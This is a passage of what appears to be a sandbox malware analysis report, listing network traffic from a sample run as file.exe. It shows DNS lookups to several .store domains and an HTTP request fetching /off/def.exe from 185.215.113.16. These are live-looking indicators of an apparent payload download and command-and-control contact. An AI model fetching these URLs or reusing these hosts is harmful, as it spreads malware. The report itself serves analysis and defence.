                                                                            Oct 29, 2024 14:11:41.008619070 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008629084 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008645058 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008651018 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008661985 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008675098 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008686066 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008693933 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008706093 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008719921 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008733034 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008744001 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008753061 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008763075 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008770943 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008780956 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008793116 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008815050 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008821964 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008832932 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008843899 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008852005 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008862019 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008872986 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008879900 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008891106 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008907080 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008912086 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008924007 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008934021 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008941889 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008953094 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008964062 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008971930 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.008981943 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.008999109 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009004116 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009023905 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009032965 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009048939 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009062052 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009074926 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009083033 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009093046 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009104013 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009109974 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009120941 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009133101 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009143114 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009152889 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009164095 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009171963 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009181976 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009192944 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009203911 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009212017 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009222031 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009232998 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009239912 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009249926 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009258032 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009269953 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009282112 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009289980 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009305954 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009316921 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009325981 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009335995 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009346962 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009354115 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009363890 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009376049 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009385109 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009394884 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009407043 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009413958 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009424925 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009435892 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009445906 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009454012 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009466887 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009474993 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009485006 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009495020 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009501934 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009514093 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009525061 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009535074 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009543896 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009560108 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009567976 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009579897 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009591103 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009598017 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009609938 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009622097 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009632111 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009641886 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009654999 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009660959 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009673119 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009682894 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009691954 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009701967 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009713888 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009721041 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009731054 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009746075 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009752035 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009763002 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009773970 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009782076 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009792089 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009799004 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009814978 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009829044 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009840965 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009848118 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009859085 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009872913 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009877920 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009890079 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009902954 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009907007 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009918928 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009929895 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009939909 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009948015 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009968042 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.009975910 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009987116 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.009996891 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010005951 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010016918 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010026932 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010034084 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010046959 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010057926 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010071039 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010076046 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010087013 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010094881 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010106087 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010117054 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010123014 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010133982 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010155916 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010163069 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010171890 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010183096 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010195017 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010206938 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010217905 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010257959 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010258913 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010258913 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010272980 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010283947 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010293961 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010308027 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010315895 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010327101 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010334969 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010348082 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010371923 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010376930 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010386944 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010397911 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010406017 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010416031 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010427952 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010438919 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010447025 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010457993 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010464907 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010476112 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010487080 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010499001 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010504961 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010519981 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010525942 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010536909 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010548115 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010564089 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010571003 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010581017 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010587931 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010600090 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010610104 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010626078 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010631084 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010646105 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010652065 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010662079 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010674000 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010688066 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010694027 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010704994 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010711908 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010721922 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010732889 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010740042 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010750055 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010762930 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010771036 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010782003 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010792017 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010802031 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010812044 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010823965 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010828018 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010837078 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010849953 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010854959 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010867119 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010879040 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010890007 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010899067 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010907888 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010915995 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010927916 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010937929 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010951042 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010957956 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010968924 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.010977983 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.010987997 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011003017 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011013985 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011023045 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011039019 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011049032 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011059999 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011070967 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011082888 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011097908 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011107922 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011116982 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011127949 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011138916 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011148930 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011158943 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011171103 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011181116 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011190891 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011198997 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011208057 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011220932 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011230946 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011243105 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011253119 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011269093 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011276007 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011286020 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011297941 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011303902 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011326075 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011337042 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011346102 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011358976 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011370897 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011379957 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011395931 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011401892 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011421919 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011434078 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011445999 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011456966 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.011467934 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:41.011477947 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:41.054124117 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:42.198179960 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:42.199533939 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:43.911946058 CET4984780192.168.2.7185.215.113.16

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 29, 2024 14:11:12.692682981 CET5316853192.168.2.71.1.1.1
                                                                            Oct 29, 2024 14:11:19.732222080 CET5123753192.168.2.71.1.1.1
                                                                            Oct 29, 2024 14:11:19.741801977 CET53512371.1.1.1192.168.2.7
                                                                            Oct 29, 2024 14:11:19.954250097 CET6502353192.168.2.71.1.1.1
                                                                            Oct 29, 2024 14:11:19.964514017 CET53650231.1.1.1192.168.2.7
                                                                            Oct 29, 2024 14:11:19.967008114 CET5850253192.168.2.71.1.1.1
                                                                            Oct 29, 2024 14:11:19.976279974 CET53585021.1.1.1192.168.2.7
                                                                            Oct 29, 2024 14:11:19.979026079 CET6166453192.168.2.71.1.1.1
                                                                            Oct 29, 2024 14:11:19.988526106 CET53616641.1.1.1192.168.2.7
                                                                            Oct 29, 2024 14:11:19.990741968 CET6546253192.168.2.71.1.1.1
                                                                            Oct 29, 2024 14:11:20.006786108 CET53654621.1.1.1192.168.2.7

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 29, 2024 14:11:12.692682981 CET192.168.2.71.1.1.10xe481Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.732222080 CET192.168.2.71.1.1.10x7a83Standard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.954250097 CET192.168.2.71.1.1.10xf85aStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.967008114 CET192.168.2.71.1.1.10x6d02Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.979026079 CET192.168.2.71.1.1.10x32c1Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.990741968 CET192.168.2.71.1.1.10xfb22Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 29, 2024 14:11:12.701004982 CET1.1.1.1192.168.2.70xe481No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:13.000965118 CET1.1.1.1192.168.2.70xc35bNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:13.000965118 CET1.1.1.1192.168.2.70xc35bNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.741801977 CET1.1.1.1192.168.2.70x7a83Name error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.964514017 CET1.1.1.1192.168.2.70xf85aName error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.976279974 CET1.1.1.1192.168.2.70x6d02Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:19.988526106 CET1.1.1.1192.168.2.70x32c1Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:20.006786108 CET1.1.1.1192.168.2.70xfb22No error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false
                                                                            Oct 29, 2024 14:11:20.006786108 CET1.1.1.1192.168.2.70xfb22No error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • necklacedmny.store
                                                                            • 185.215.113.16

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.749847185.215.113.16807308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 29, 2024 14:11:38.592226028 CET200OUTGET /off/def.exe HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Host: 185.215.113.16
                                                                            Oct 29, 2024 14:11:39.524311066 CET1236INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 29 Oct 2024 13:11:39 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 2810880
                                                                            Last-Modified: Tue, 29 Oct 2024 12:11:15 GMT
                                                                            Connection: keep-alive
                                                                            ETag: "6720d0e3-2ae400"
                                                                            Accept-Ranges: bytes
